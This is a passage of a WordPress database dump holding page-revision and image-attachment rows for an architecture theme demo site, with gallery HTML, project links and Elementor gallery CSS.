e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS02LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS03LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-8.jpeg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-8\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS04LmpwZWciLCJzbGlkZXNob3ciOiJhbGwtMDBkOTM5MCJ9\">\n														</a>','Office','','inherit','closed','closed','','4759-revision-v1','','','2023-05-30 08:46:21','2023-05-30 08:46:21','',4759,'https://bauhaus.futuremediatrix.com/?p=4811',0,'revision','',0),(4812,2,'2023-05-30 08:52:28','2023-05-30 08:52:28','','residential-1','','inherit','open','closed','','residential-1','','','2023-05-30 08:52:28','2023-05-30 08:52:28','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-1.jpg',0,'attachment','image/jpeg',0),(4813,2,'2023-05-30 08:52:30','2023-05-30 08:52:30','','residential-2','','inherit','open','closed','','residential-2','','','2023-05-30 08:52:30','2023-05-30 08:52:30','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-2.jpg',0,'attachment','image/jpeg',0),(4814,2,'2023-05-30 08:52:33','2023-05-30 08:52:33','','residential-3','','inherit','open','closed','','residential-3','','','2023-05-30 08:52:33','2023-05-30 08:52:33','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-3.jpg',0,'attachment','image/jpeg',0),(4815,2,'2023-05-30 08:52:34','2023-05-30 08:52:34','','residential-4','','inherit','open','closed','','residential-4','','','2023-05-30 08:52:34','2023-05-30 08:52:34','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-4.jpg',0,'attachment','image/jpeg',0),(4816,2,'2023-05-30 08:52:36','2023-05-30 08:52:36','','residential-5','','inherit','open','closed','','residential-5','','','2023-05-30 08:52:36','2023-05-30 08:52:36','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-5.jpg',0,'attachment','image/jpeg',0),(4817,2,'2023-05-30 08:52:39','2023-05-30 08:52:39','','residential-6','','inherit','open','closed','','residential-6','','','2023-05-30 08:52:39','2023-05-30 08:52:39','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-6.jpg',0,'attachment','image/jpeg',0),(4818,2,'2023-05-30 08:52:42','2023-05-30 08:52:42','','residential-7','','inherit','open','closed','','residential-7','','','2023-05-30 08:52:42','2023-05-30 08:52:42','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-7.jpg',0,'attachment','image/jpeg',0),(4819,2,'2023-05-30 08:53:28','2023-05-30 08:53:28','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Residential','','inherit','closed','closed','','560-revision-v1','','','2023-05-30 08:53:28','2023-05-30 08:53:28','',560,'https://bauhaus.futuremediatrix.com/?p=4819',0,'revision','',0),(4820,2,'2023-05-30 08:53:29','2023-05-30 08:53:29','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Residential','','inherit','closed','closed','','560-revision-v1','','','2023-05-30 08:53:29','2023-05-30 08:53:29','',560,'https://bauhaus.futuremediatrix.com/?p=4820',0,'revision','',0),(4821,2,'2023-05-30 08:53:29','2023-05-30 08:53:29','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTEuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTIuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTMuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-4\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTQuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTUuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-6\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTYuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTcuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>','Residential','','inherit','closed','closed','','560-revision-v1','','','2023-05-30 08:53:29','2023-05-30 08:53:29','',560,'https://bauhaus.futuremediatrix.com/?p=4821',0,'revision','',0),(4822,2,'2023-05-30 08:54:50','2023-05-30 08:54:50','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a 